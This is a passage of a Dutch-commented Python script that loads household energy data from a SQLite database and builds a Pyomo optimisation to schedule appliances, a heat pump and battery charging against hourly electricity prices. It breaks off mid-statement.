********** Tuples omzetten naar lijsten **********\n# Verbinding maken met de database + cursor plaatsen (wss om te weten in welke database je wilt werken?)\ncon = sqlite3.connect(\"D_VolledigeDatabase.db\")\ncur = con.cursor()\n#######################################################################################################################\n# Zoekt de kolom Apparaten uit de tabel Geheugen\nres = cur.execute(\"SELECT Apparaten FROM Geheugen\")\n# Geeft alle waarden in die kolom in de vorm van een lijst van tuples\nListTuplesApparaten = res.fetchall()\n# Functie om lijst van tuples om te zetten naar lijst van strings of integers\nindex = -1\nApparaten = tuples_to_list(ListTuplesApparaten, \"Apparaten\", index)\nif len(Apparaten) != len(ListTuplesApparaten):\n index = len(Apparaten)\n# Idem vorige\nres = cur.execute(\"SELECT Wattages FROM Geheugen\")\nListTuplesWattages = res.fetchall()\nWattages = tuples_to_list(ListTuplesWattages, \"Wattages\", index)\n\nres = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\nListTuplesExacteUren = res.fetchall()\nExacteUren = tuples_to_list(ListTuplesExacteUren, \"ExacteUren\", index)\n\nres = cur.execute(\"SELECT BeginUur FROM Geheugen\")\nListTuplesBeginUur = res.fetchall()\nBeginUur = tuples_to_list(ListTuplesBeginUur, \"BeginUur\", index)\n\nres = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\nListTuplesFinaleTijdstip = res.fetchall()\nFinaleTijdstip = tuples_to_list(ListTuplesFinaleTijdstip, \"FinaleTijdstip\", index)\n\nres = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\nListTuplesUrenWerk = res.fetchall()\nUrenWerk = tuples_to_list(ListTuplesUrenWerk, \"UrenWerk\", index)\n\nres = cur.execute(\"SELECT UrenNaElkaar FROM Geheugen\")\nListTuplesUrenNaElkaar = res.fetchall()\nUrenNaElkaar = tuples_to_list(ListTuplesUrenNaElkaar, \"UrenNaElkaar\", index)\n\nres = cur.execute(\"SELECT SoortApparaat FROM Geheugen\")\nListTuplesSoortApparaat = res.fetchall()\nSoortApparaat = tuples_to_list(ListTuplesSoortApparaat, \"SoortApparaat\", index)\n\nres = cur.execute(\"SELECT RememberSettings FROM Geheugen\")\nListTuplesRememberSettings = res.fetchall()\nRememberSettings = tuples_to_list(ListTuplesRememberSettings, \"RememberSettings\", index)\n\nres = cur.execute(\"SELECT Status FROM Geheugen\")\nListTuplesStatus = res.fetchall()\nStatus = tuples_to_list(ListTuplesStatus, \"Status\", index)\n#######################################################################################################################\nindex = -1\nres = cur.execute(\"SELECT VastVerbruik FROM InfoLijsten24uur\")\nListTuplesVastVerbruik = res.fetchall()\nVastVerbruik = tuples_to_list(ListTuplesVastVerbruik, \"VastVerbruik\", index)\n#######################################################################################################################\nindex = -1\nres = cur.execute(\"SELECT Aantal FROM Zonnepanelen\")\nTupleAantal = res.fetchall()\nAantal = [int(i2[0]) for i2 in TupleAantal][0]\n\nres = cur.execute(\"SELECT Oppervlakte FROM Zonnepanelen\")\nTupleOppervlakte = res.fetchall()\nOppervlakte = [float(i2[0]) for i2 in TupleOppervlakte][0]\n\nres = cur.execute(\"SELECT Rendement FROM Zonnepanelen\")\nTupleRendement = res.fetchall()\nRendement = [float(i2[0]) for i2 in TupleRendement][0]\n#######################################################################################################################\nindex = -1\nres = cur.execute(\"SELECT NamenBatterijen FROM Batterijen\")\nListTuplesNamenBatterijen = res.fetchall()\nNamenBatterijen = 
tuples_to_list(ListTuplesNamenBatterijen, \"NamenBatterijen\", index)\nif len(NamenBatterijen) != len(ListTuplesNamenBatterijen):\n index = len(NamenBatterijen)\n\nres = cur.execute(\"SELECT MaxEnergie FROM Batterijen\")\nListTuplesMaxEnergie = res.fetchall()\nMaxEnergie = tuples_to_list(ListTuplesMaxEnergie, \"MaxEnergie\", index)\n\nres = cur.execute(\"SELECT OpgeslagenEnergie FROM Batterijen\")\nListTuplesOpgeslagenEnergie = res.fetchall()\nOpgeslagenEnergie = tuples_to_list(ListTuplesOpgeslagenEnergie, \"OpgeslagenEnergie\", index)\n#######################################################################################################################\nres = cur.execute(\"SELECT TemperatuurHuis FROM Huisgegevens\")\nTupleTemperatuurHuis = res.fetchall()\nTemperatuurHuis = [float(i2[0]) for i2 in TupleTemperatuurHuis][0]\n\nres = cur.execute(\"SELECT MinTemperatuur FROM Huisgegevens\")\nTupleMinTemperatuur = res.fetchall()\nMinTemperatuur = [float(i2[0]) for i2 in TupleMinTemperatuur][0]\n\nres = cur.execute(\"SELECT MaxTemperatuur FROM Huisgegevens\")\nTupleMaxTemperatuur = res.fetchall()\nMaxTemperatuur = [float(i2[0]) for i2 in TupleMaxTemperatuur][0]\n\nres = cur.execute(\"SELECT VerbruikWarmtepomp FROM Huisgegevens\")\nTupleVerbruikWarmtepomp = res.fetchall()\nVerbruikWarmtepomp = [float(i2[0]) for i2 in TupleVerbruikWarmtepomp][0]\n\nres = cur.execute(\"SELECT COP FROM Huisgegevens\")\nTupleCOP = res.fetchall()\nCOP = [float(i2[0]) for i2 in TupleCOP][0]\n\nres = cur.execute(\"SELECT UWaarde FROM Huisgegevens\")\nTupleUWaarde = res.fetchall()\nUWaarde = [float(i2[0]) for i2 in TupleUWaarde][0]\n\nres = cur.execute(\"SELECT OppervlakteMuren FROM Huisgegevens\")\nTupleOppervlakteMuren = res.fetchall()\nOppervlakteMuren = [float(i2[0]) for i2 in TupleOppervlakteMuren][0]\n\nres = cur.execute(\"SELECT VolumeHuis FROM Huisgegevens\")\nTupleVolumeHuis = res.fetchall()\nVolumeHuis = [float(i2[0]) for i2 in TupleVolumeHuis][0]\n\nres = cur.execute(\"SELECT Kost FROM Huisgegevens\")\nTupleKost = res.fetchall()\nKost = [float(i2[0]) for i2 in TupleKost][0]\n#######################################################################################################################\nres = cur.execute(\"SELECT SentinelOptimalisatie FROM ExtraWaarden\")\nTupleSentinelOptimalisatie = res.fetchall()\nSentinelOptimalisatie = [int(i2[0]) for i2 in TupleSentinelOptimalisatie][0]\n\nres = cur.execute(\"SELECT SentinelInterface FROM ExtraWaarden\")\nTupleSentinelInterface = res.fetchall()\nSentinelInterface = [int(i2[0]) for i2 in TupleSentinelInterface][0]\n\nres = cur.execute(\"SELECT HuidigeDatum FROM ExtraWaarden\")\nTupleHuidigeDatum = res.fetchall()\nHuidigeDatum = [i2[0] for i2 in TupleHuidigeDatum][0]\n\nres = cur.execute(\"SELECT HuidigUur FROM ExtraWaarden\")\nTupleHuidigUur = res.fetchall()\nHuidigUur = [int(i2[0]) for i2 in TupleHuidigUur][0]\n\nres = cur.execute(\"SELECT TijdSeconden FROM ExtraWaarden\")\nTupleTijdSeconden = res.fetchall()\nTijdSeconden = [int(i2[0]) for i2 in TupleTijdSeconden][0]\n#######################################################################################################################\n# Ter 
illustratie\nprint(\"----------TupleToList----------\")\n\nprint(Apparaten)\nprint(Wattages)\nprint(ExacteUren)\nprint(BeginUur)\nprint(FinaleTijdstip)\nprint(UrenWerk)\nprint(UrenNaElkaar)\nprint(SoortApparaat)\nprint(RememberSettings)\nprint(Status)\n\nprint(VastVerbruik)\n\nprint(Aantal)\nprint(Oppervlakte)\nprint(Rendement)\n\nprint(NamenBatterijen)\nprint(MaxEnergie)\nprint(OpgeslagenEnergie)\n\nprint(TemperatuurHuis)\nprint(Kost)\n\nprint(SentinelOptimalisatie)\nprint(SentinelInterface)\nprint(HuidigeDatum)\nprint(HuidigUur)\nprint(TijdSeconden)\n###################################################################################################################\n##### Gegevens uit de csv bestanden opvragen #####\nprint(\"----------GegevensOpvragen24uur----------\")\nPrijzen24uur, Gegevens24uur = gegevens_opvragen()\n###################################################################################################################\n##### Parameters updaten #####\nEFFICIENTIE = 0.2\nOPP_ZONNEPANELEN = 12\n\"\"\" Uit tabel Stroomprijzen en Weer \"\"\"\nprijzen = Prijzen24uur\nstroom_zonnepanelen = [irradiantie * EFFICIENTIE * OPP_ZONNEPANELEN for irradiantie in Gegevens24uur[1]]\n\n\"\"\" Uit tabel Geheugen \"\"\"\nnamen_apparaten = Apparaten\nwattagelijst = Wattages\nvoorwaarden_apparaten_exact = ExacteUren\nstarturen = BeginUur\neinduren = FinaleTijdstip\nwerkuren_per_apparaat = UrenWerk\nuren_na_elkaarVAR = UrenNaElkaar\ntypes_apparaten = SoortApparaat\n\n\"\"\" Extra gegevens voor het optimalisatiealgoritme \"\"\"\naantal_apparaten = len(wattagelijst)\nDelta_t = 1 # bekijken per uur\naantal_uren = len(prijzen)\n\n\"\"\" Uit tabel Batterijen \"\"\"\nbatterij_bovengrens = sum(MaxEnergie)\nhuidig_batterijniveau = sum(OpgeslagenEnergie)\nmax_opladen_batterij = 14\nmax_ontladen_batterij = 15\n\n\"\"\" Extra gegevens om realistischer te maken \"\"\"\nvast_verbruik_gezin = [12 for i in range(24)]\nmaximaal_verbruik_per_uur = [3500 for i in range(len(prijzen))]\nverkoopprijs_van_zonnepanelen = [prijzen[p] / 2 for p in range(len(prijzen))]\nverbruik_gezin_totaal = VastVerbruik\nverbruik_gezin_totaal = [[3,3,3] for i in range(24)]\n\n\"\"\" Uit tabel Huisgegevens \"\"\"\nbegintemperatuur_huis = TemperatuurHuis # in graden C\n\"\"\" Extra gegevens voor boilerfunctie \"\"\"\nverliesfactor_huis_per_uur = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] # in graden C\ntemperatuurwinst_per_uur = [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2] # in graden C\nondergrens = 17 # mag niet kouder worden dan dit\nbovengrens = 22 # mag niet warmer worden dan dit\n\n# controle op tegenstrijdigheden in code\n\nassert len(wattagelijst) == len(namen_apparaten) == len(voorwaarden_apparaten_exact) == len(\n werkuren_per_apparaat)\nfor i in range(len(voorwaarden_apparaten_exact)):\n if type(werkuren_per_apparaat[i]) == int:\n assert len(voorwaarden_apparaten_exact[i]) <= werkuren_per_apparaat[i]\n for p in range(len(voorwaarden_apparaten_exact[i])):\n if len(voorwaarden_apparaten_exact[i]) > 0:\n if type(voorwaarden_apparaten_exact[i][p]) == int and type(einduren[i]) == int:\n assert voorwaarden_apparaten_exact[i][p] < einduren[i]\n\n# Ter 
illustratie\nprint(\"----------ParametersBenoemen----------\")\nprint(\"prijzen\")\nprint(prijzen)\nprint(\"stroom_zonnepanelen\")\nprint(stroom_zonnepanelen)\nprint(\"namen_apparaten\")\nprint(namen_apparaten)\nprint(\"wattagelijst\")\nprint(wattagelijst)\nprint(\"voorwaarden_apparaten_exact\")\nprint(voorwaarden_apparaten_exact)\nprint(\"starturen\")\nprint(starturen)\nprint(\"einduren\")\nprint(einduren)\nprint(\"werkuren_per_apparaat\")\nprint(werkuren_per_apparaat)\nprint(\"uren_na_elkaarVAR\")\nprint(uren_na_elkaarVAR)\n\n\n###################################################################################################################\n# definiëren functies\ndef variabelen_constructor(lijst, aantal_apparaten, aantal_uren):\n for p in range(aantal_uren*aantal_apparaten): # totaal aantal nodige variabelen = uren maal apparaten\n lijst.add() # hier telkens nieuwe variabele aanmaken\n\ndef objectieffunctie(prijzen, variabelen, Delta_t, wattagelijst, aantal_uren, stroom_zonnepanelen, vast_verbruik_gezin,\n batterij_ontladen, batterij_opladen):\n obj_expr = 0\n for p in range(aantal_uren):\n subexpr = 0\n for q in range(len(wattagelijst)):\n subexpr = subexpr + wattagelijst[q] * variabelen[q * aantal_uren + (\n p + 1)] # eerst de variabelen van hetzelfde uur samentellen om dan de opbrengst van zonnepanelen eraf te trekken\n obj_expr = obj_expr + Delta_t * prijzen[p] * (subexpr - stroom_zonnepanelen[p] + vast_verbruik_gezin[p] +\n batterij_ontladen[p+1] + batterij_opladen[p+1])\n return obj_expr\n\ndef exacte_beperkingen(variabelen, voorwaarden_apparaten, aantal_apparaten, voorwaarden_apparaten_lijst, aantal_uren):\n for q in range(aantal_uren*aantal_apparaten):\n index_voor_voorwaarden = q//aantal_uren # hierdoor weet je bij welk apparaat de uur-constraint hoort\n indexnummers = voorwaarden_apparaten_lijst[index_voor_voorwaarden] # hier wordt de uur-constraint, horende bij een bepaald apparaat, opgevraagd\n for p in indexnummers:\n if type(p) != str: # kan ook dat er geen voorwaarde is, dan wordt de uitdrukking genegeerd\n voorwaarden_apparaten.add(expr=variabelen[p+ index_voor_voorwaarden*aantal_uren] == 1) # variabele wordt gelijk gesteld aan 1\n\ndef uiteindelijke_waarden(variabelen, aantaluren, namen_apparaten, wattagelijst, huidig_batterijniveau, verliesfactor,\n winstfactor, huidige_temperatuur, batterij_ontladen, batterij_opladen):\n print('-' * 30)\n print('De totale kost is', pe.value(m.obj), 'euro') # de kost printen\n kost = pe.value(m.obj)\n\n print('-' * 30)\n print('toestand apparaten (0 = uit, 1 = aan):')\n\n for p in range(len(variabelen)):\n if p % aantaluren == 0: # hierdoor weet je wanneer je het volgende apparaat begint te beschrijven\n print('toestel nr.', p / aantaluren + 1, '(', namen_apparaten[int(p / aantaluren)],\n ')') # opdeling maken per toestel\n print(pe.value(variabelen[p + 1]))\n print('Batterij_ontladen:')\n for p in range(1, aantaluren + 1):\n print(pe.value(batterij_ontladen[p]))\n print('Batterij_opladen:')\n for p in range(1, aantaluren+1):\n print(pe.value(batterij_opladen[p]))\n\n apparaten_aanofuit = []\n for p in range(len(namen_apparaten)):\n apparaten_aanofuit.append(pe.value(variabelen[aantaluren * p + 1]))\n nieuw_batterijniveau = pe.value(\n huidig_batterijniveau + batterij_ontladen[1] + batterij_opladen[1])\n i_warmtepomp = namen_apparaten.index('warmtepomp')\n nieuwe_temperatuur = pe.value(\n huidige_temperatuur + winstfactor[0] * variabelen[aantaluren * i_warmtepomp + 1] - verliesfactor[0])\n batterij_ontladen_uur1 = 
pe.value(batterij_ontladen[1])\n batterij_opladen_uur1 = pe.value(batterij_opladen[1])\n som = batterij_opladen_uur1 + batterij_ontladen_uur1\n return kost, apparaten_aanofuit, nieuw_batterijniveau, nieuwe_temperatuur, som\n\ndef beperkingen_aantal_uur(werkuren_per_apparaat, variabelen, voorwaarden_werkuren, aantal_uren, einduren, types_apparaten):\n for p in range(len(werkuren_per_apparaat)):\n som = 0\n for q in range(1,aantal_uren+1):\n som = som + variabelen[p*aantal_uren + q] # hier neem je alle variabelen van hetzelfde apparaat, samen\n if type(werkuren_per_apparaat[p]) == int and ((type(einduren[p]) == int and einduren[p] <= aantal_uren)\n or types_apparaten[p] == 'Always on'):\n voorwaarden_werkuren.add(expr = som == werkuren_per_apparaat[p]) # apparaat moet x uur aanstaan\n\ndef starttijd(variabelen, starturen, constraint_lijst_startuur, aantal_uren):\n for q in range(len(starturen)):\n if type(starturen[q]) != str:\n p = starturen[q]\n for s in range(1, p):\n constraint_lijst_startuur.add(expr= variabelen[aantal_uren*q + s] == 0)\n\ndef finaal_uur(finale_uren, variabelen, constraint_lijst_finaal_uur, aantal_uren):\n for q in range(len(finale_uren)): # dit is welk aparaat het over gaat\n if type(finale_uren[q]) == int and finale_uren[q] <= aantal_uren:\n p = finale_uren[q]-1 # dit is het eind uur, hierna niet meer in werking\n for s in range(p + 1, aantal_uren + 1):\n constraint_lijst_finaal_uur.add(expr=variabelen[(aantal_uren*q) + s] == 0)\n\ndef aantal_uren_na_elkaar(uren_na_elkaarVAR, variabelen, constraint_lijst_aantal_uren_na_elkaar, aantal_uren,\n variabelen_start, einduren):\n # Dat een bepaald apparaat x aantal uur moet werken staat al in beperking_aantal_uur dus niet meer hier\n # wel nog zeggen dat de som van de start waardes allemaal slechts 1 mag zijn\n for i in range(len(uren_na_elkaarVAR)): # zegt welk apparaat\n if type(uren_na_elkaarVAR[i]) == int and (type(einduren[i]) == int and einduren[i] <= aantal_uren):\n opgetelde_start = 0\n for p in range(1, aantal_uren + 1): # zegt welk uur het is\n opgetelde_start = opgetelde_start + variabelen_start[aantal_uren * i + p]\n #print('dit is eerste constraint', opgetelde_start)\n constraint_lijst_aantal_uren_na_elkaar.add(expr=opgetelde_start == 1)\n for i in range(len(uren_na_elkaarVAR)): # dit loopt de apparaten af\n if type(uren_na_elkaarVAR[i]) == int and (type(einduren[i]) == int and einduren[i] <= aantal_uren):\n #print('dit is nieuwe i', i)\n k = 0\n som = 0\n for p in range(0, aantal_uren): # dit loopt het uur af\n SENTINEL = 1\n #print('dit is een nieuwe p', p)\n # print('juist of fout', k < uren_na_elkaarVAR[i], k, uren_na_elkaarVAR[i])\n # print('juist of fout', k < p)\n while k < uren_na_elkaarVAR[i] and k < p + 1:\n # print('EERSTE while')\n som = som + variabelen_start[aantal_uren * i + p + 1]\n k = k + 1\n #print('dit is mijn som1', som, 'en is gelijk aan', variabelen[aantal_uren * i + p + 1])\n constraint_lijst_aantal_uren_na_elkaar.add(expr=variabelen[aantal_uren * i + p + 1] == som)\n SENTINEL = 0\n while k <= aantal_uren and k >= uren_na_elkaarVAR[i] and SENTINEL == 1:\n #print('tweede while', 'eerste index', aantal_uren * i + p + 1, 'tweede index',\n #aantal_uren * i + p - uren_na_elkaarVAR[i] +1)\n som = som + variabelen_start[aantal_uren * i + p + 1] - variabelen_start[aantal_uren * i + p - uren_na_elkaarVAR[i] + 1]\n #print('dit is mijn som2', som, 'en is gelijk aan', variabelen[aantal_uren * i + p + 1])\n k = k + 1\n SENTINEL = 0\n 
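# Aside: the start-variable trick being built here generalizes cleanly. An
# appliance that must run K consecutive hours gets one binary start flag per
# hour, the flags sum to 1, and on[t] equals the rolling sum of the last K
# start flags. A minimal pure-Python sketch of that linearization (horizon,
# start hour and K are illustrative values, not taken from this model):
def consecutive_run_schedule(start_hour, K, horizon=24):
    start = [1 if t == start_hour else 0 for t in range(horizon)]  # one-hot start
    return [sum(start[max(0, t - K + 1):t + 1]) for t in range(horizon)]

print(consecutive_run_schedule(start_hour=3, K=4))  # hours 3..6 come out as 1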
constraint_lijst_aantal_uren_na_elkaar.add(expr=variabelen[aantal_uren * i + p + 1] == som)\n\ndef voorwaarden_max_verbruik(variabelen, max_verbruik_per_uur, constraintlijst_max_verbruik, wattagelijst, delta_t,\n opbrengst_zonnepanelen, batterij_ontladen, batterij_opladen):\n totaal_aantal_uren = len(max_verbruik_per_uur)\n for p in range(1, len(max_verbruik_per_uur) + 1):\n som = 0\n for q in range(len(wattagelijst)):\n som = som + delta_t * wattagelijst[q] * (variabelen[q * totaal_aantal_uren + p])\n som = som + opbrengst_zonnepanelen[p-1] + batterij_opladen[p] + batterij_ontladen[p]\n uitdrukking = (-max_verbruik_per_uur[p - 1], som, max_verbruik_per_uur[p - 1])\n constraintlijst_max_verbruik.add(expr=uitdrukking)\n\ndef voorwaarden_warmteboiler(apparaten, variabelen,voorwaardenlijst, warmteverliesfactor, warmtewinst, aanvankelijke_temperatuur, ondergrens, bovengrens, aantaluren):\n temperatuur_dit_uur = aanvankelijke_temperatuur\n if not 'warmtepomp' in apparaten:\n return\n index_warmteboiler = apparaten.index('warmtepomp')\n beginindex_in_variabelen = index_warmteboiler*aantaluren +1\n if aanvankelijke_temperatuur < ondergrens:\n voorwaardenlijst.add(expr= variabelen[beginindex_in_variabelen] == 1)\n elif aanvankelijke_temperatuur > bovengrens:\n voorwaardenlijst.add(expr= variabelen[beginindex_in_variabelen] == 0)\n else:\n index_verlies = 0\n for p in range(beginindex_in_variabelen,beginindex_in_variabelen + aantaluren):\n temperatuur_dit_uur = temperatuur_dit_uur-warmteverliesfactor[index_verlies] + warmtewinst[index_verlies]*variabelen[p]\n uitdrukking = (ondergrens, temperatuur_dit_uur, bovengrens)\n voorwaardenlijst.add(expr= uitdrukking)\n index_verlies = index_verlies + 1\n\ndef som_tot_punt(variabelen, beginpunt, eindpunt):\n som = 0\n for i in range(beginpunt, eindpunt+1):\n som = som + variabelen[i]\n return som\n\ndef voorwaarden_batterij(batterij_ontladen, batterij_opladen, constraintlijst, aantaluren,\n huidig_batterijniveau, batterij_bovengrens):\n for q in range(1, aantaluren + 1):\n som_ontladen = som_tot_punt(batterij_ontladen, 1, q)\n som_opladen = som_tot_punt(batterij_opladen, 1, q)\n verschil = som_opladen + som_ontladen + huidig_batterijniveau\n constraintlijst.add(expr=(0, verschil, batterij_bovengrens))\n\n# een lijst maken die de stand van de batterij gaat bijhouden als aantal wat maal aantal uur\n# op het einde van het programma dan aanpassen wat die batterij het laatste uur heeft gedaan en zo bijhouden in de database in die variabele\n# het getal in die variabele trek je ook altijd op bij som ontladen en som ontladen hierboven\n\n# deze functie zal het aantal uur dat het apparaat moet werken verlagen op voorwaarden dat het apparaat ingepland stond\n# voor het eerste uur\ndef verlagen_aantal_uur(lijst, aantal_uren, te_verlagen_uren, namen_apparaten_def): # voor aantal uur mogen er geen '/' ingegeven worden, dan crasht het\n global con, cur, res\n print(\"Urenwerk na functie verlagen_aantal_uur\")\n res = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(te_verlagen_uren)):\n if pe.value(lijst[i * aantal_uren + 1]) == 1 and namen_apparaten_def[i] != \"warmtepomp\" and \\\n namen_apparaten_def[i] != \"batterij_ontladen\" and namen_apparaten_def[i] != \"batterij_opladen\":\n cur.execute(\"UPDATE Geheugen SET UrenWerk =\" + str(te_verlagen_uren[i] - 1) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n res = cur.execute(\"SELECT UrenWerk FROM Geheugen\")\n print(res.fetchall())\n\n\ndef 
uur_omzetten(exacte_uren1apparaat):\n string = \"'\"\n for i2 in range(len(exacte_uren1apparaat)):\n if exacte_uren1apparaat[i2] == \"/\":\n return str(0)\n else:\n string = string + str(exacte_uren1apparaat[i2]) + \":\"\n string = string[0:-1] + \"'\"\n return string\n\n\n# deze functie zal exacte uren als 'aan' aanduiden op voorwaarde dat het eerste uur als 'aan' was aangeduid en er ook was aangeduid dat\n# het apparaat x aantal uur na elkaar moest aanstaan, elk uur tot x-1 zal dan al naar 'aan' worden aangeduid voor de volgende berekeningen terug beginnen\ndef opeenvolging_opschuiven(lijst, aantal_uren, opeenvolgende_uren, oude_exacte_uren):\n global con, cur, res\n print(\"ExacteUren en eventueel UrenNaElkaar na functie opeenvolging_opschuiven \")\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n res = cur.execute(\"SELECT UrenNaElkaar FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(opeenvolgende_uren)):\n if type(opeenvolgende_uren[i]) == int and pe.value(lijst[i * aantal_uren + 1]) == 1:\n nieuwe_exacte_uren = []\n for p in range(1, opeenvolgende_uren[i] + 1): # dus voor opeenvolgende uren 5, p zal nu 1,2,3,4\n nieuwe_exacte_uren.append(p)\n cur.execute(\"UPDATE Geheugen SET ExacteUren =\" + uur_omzetten(nieuwe_exacte_uren) +\n \" WHERE Nummering =\" + str(i))\n cur.execute(\"UPDATE Geheugen SET UrenNaElkaar =\" + str(0) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n\n # Ter illustratie\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n res = cur.execute(\"SELECT UrenNaElkaar FROM Geheugen\")\n print(res.fetchall())\n\n # in database toevoegen dat i^de lijst 1,2,3,4 allen op 1 worden gezet dus bij in exact uur lijst, dus elke p in lijst i toevoegen\n\n # extra: bij dit apparaat '' zetten in de plaats van opeenvolgende aantal uur zodat die geen 24 constraints meer moet gaan maken achteraf\n\n\n# deze functie zal alle exacte uren die er waren verlagen met 1, als het 0 wordt dan wordt het later verwijderd uit de lijst\ndef verlagen_exacte_uren(exacte_uren):\n global con, cur, res\n print(\"ExacteUren na functie verlagen_exacte_uren\")\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(exacte_uren)): # dit gaat de apparaten af\n if exacte_uren[i] != ['/']:\n verlaagde_exacte_uren = []\n for uur in exacte_uren[i]: # dit zal lopen over al de 'exacte uren' van een specifiek apparaat\n if len(exacte_uren[i]) != 1:\n if uur - 1 != 0:\n verlaagde_exacte_uren.append(uur - 1)\n else:\n verlaagde_exacte_uren.append(uur - 1)\n if verlaagde_exacte_uren[0] == 0:\n verlaagde_exacte_uren = \"/\"\n cur.execute(\"UPDATE Geheugen SET ExacteUren =\" + uur_omzetten(verlaagde_exacte_uren) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n\n # Ter illustratie\n res = cur.execute(\"SELECT ExacteUren FROM Geheugen\")\n print(res.fetchall())\n\n\n# deze functie zal een apparaat volledig verwijderen uit alle lijsten, wnr het aantal uur dat het moet werken op nul is gekomen\ndef verwijderen_uit_lijst_wnr_aantal_uur_0(aantal_uren_per_apparaat, lijst_met_wattages,\n exacte_uren, prijzen_stroom, einduren, aantal_uren):\n global con, cur, res\n # uren_na_elkaarVAR wordt gebaseerd op werkuren per apparaat dus die moet je niet zelf meer aanpassen\n print(\"Gegevens verwijderen na functie verwijderen_uit_lijst_wnr_aantal_uur_0\")\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(aantal_uren_per_apparaat)):\n if 
aantal_uren_per_apparaat[\n i] == \"/\": # dan gaan we dit apparaat overal verwijderen uit alle lijsten die we hebben\n # eerst lijst met wattages apparaat verwijderen\n cur.execute(\"UPDATE Geheugen SET FinaleTijdstip =\" + str(0) +\n \" WHERE Nummering =\" + str(i))\n # geen nut\n # cur.execute(\"UPDATE Geheugen SET Wattages =\" + str(0) +\n # \" WHERE Nummering =\" + str(i))\n # cur.execute(\"UPDATE Geheugen SET ExacteUren =\" + str(0) +\n # \" WHERE Nummering =\" + str(i))\n # voorlopig niet doen\n # cur.execute(\"UPDATE Geheugen SET Apparaten =\" + str(0) +\n # \" WHERE Nummering =\" + str(i))\n con.commit()\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n\n\n# deze functie zal het finale uur eentje verlagen\ndef verlagen_finale_uur(klaar_tegen_bepaald_uur):\n global con, cur, res\n print(\"FinaleTijdstip na functie verlagen_finale_uur\")\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(klaar_tegen_bepaald_uur)):\n if type(klaar_tegen_bepaald_uur[i]) == int:\n cur.execute(\"UPDATE Geheugen SET FinaleTijdstip =\" + str(klaar_tegen_bepaald_uur[i] - 1) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n # Ter illustratie\n res = cur.execute(\"SELECT FinaleTijdstip FROM Geheugen\")\n print(res.fetchall())\n\n\ndef verlagen_start_uur(start_op_bepaald_uur):\n global con, cur, res\n print(\"Startuur na functie verlagen_start_uur\")\n res = cur.execute(\"SELECT BeginUur FROM Geheugen\")\n print(res.fetchall())\n for i in range(len(start_op_bepaald_uur)):\n if type(start_op_bepaald_uur[i]) == int:\n cur.execute(\"UPDATE Geheugen SET BeginUur =\" + str(start_op_bepaald_uur[i] - 1) +\n \" WHERE Nummering =\" + str(i))\n con.commit()\n # Ter illustratie\n res = cur.execute(\"SELECT BeginUur FROM Geheugen\")\n print(res.fetchall())\n # zo aanpassen in database nu\n # einduren[i] = einduren[i] - 1\ndef vast_verbruik_aanpassen(verbruik_gezin_totaal, current_hour):\n if len(verbruik_gezin_totaal) > 0:\n if len(verbruik_gezin_totaal[current_hour]) > 0:\n del verbruik_gezin_totaal[current_hour][0]\n verbruik_gezin_totaal[current_hour].append(uniform(2,4))\n\n#######################################################################################################\n# aanmaken lijst met binaire variabelen\nm.apparaten = pe.VarList(domain=pe.Binary)\nm.apparaten.construct()\nvariabelen_constructor(m.apparaten, aantal_apparaten, aantal_uren) # maakt variabelen aan die apparaten voorstellen\n\n# variabelen aanmaken batterij en domein opleggen\nm.batterij_ontladen = pe.VarList()\nm.batterij_opladen = pe.VarList()\nm.voorwaarden_batterij_grenzen = pe.ConstraintList()\nvariabelen_constructor(m.batterij_ontladen, 1, aantal_uren)\nvariabelen_constructor(m.batterij_opladen, 1, aantal_uren)\nfor p in range(1, aantal_uren+1):\n m.voorwaarden_batterij_grenzen.add(expr = (-max_ontladen_batterij, m.batterij_ontladen[p], 0))\n m.voorwaarden_batterij_grenzen.add(expr = (0, m.batterij_opladen[p], max_opladen_batterij))\n\n# objectief functie aanmaken\nobj_expr = objectieffunctie(prijzen, m.apparaten, Delta_t, wattagelijst, aantal_uren, stroom_zonnepanelen,\n vast_verbruik_gezin, m.batterij_ontladen, m.batterij_opladen) # somfunctie die objectief creeërt\nm.obj = pe.Objective(sense=pe.minimize, expr=obj_expr)\n\n# aanmaken constraint om op exact uur aan of uit te staan\nm.voorwaarden_exact = pe.ConstraintList() # voorwaarde om op een exact uur aan of uit te staan\nm.voorwaarden_exact.construct()\nexacte_beperkingen(m.apparaten, 
m.voorwaarden_exact, aantal_apparaten, voorwaarden_apparaten_exact,\n aantal_uren) # beperkingen met vast uur\n\n# aanmaken constraint om aantal werkuren vast te leggen\nm.voorwaarden_aantal_werkuren = pe.ConstraintList()\nm.voorwaarden_aantal_werkuren.construct()\nbeperkingen_aantal_uur(werkuren_per_apparaat, m.apparaten, m.voorwaarden_aantal_werkuren, aantal_uren, einduren,\n types_apparaten) # moet x uur werken, maakt niet uit wanneer\n\n# aanmaken constraint om startuur vast te leggen\nm.voorwaarden_startuur = pe.ConstraintList()\nm.voorwaarden_startuur.construct()\nstarttijd(m.apparaten, starturen, m.voorwaarden_startuur, aantal_uren)\n\n# aanmaken constraint om een finaal uur vast te leggen\nm.voorwaarden_finaal_uur = pe.ConstraintList()\nm.voorwaarden_finaal_uur.construct()\nfinaal_uur(einduren, m.apparaten, m.voorwaarden_finaal_uur, aantal_uren) # moet na een bepaald uur klaarzijn\n\n# Voor functie aantal_uren_na_elkaar\nm.apparatenstart = 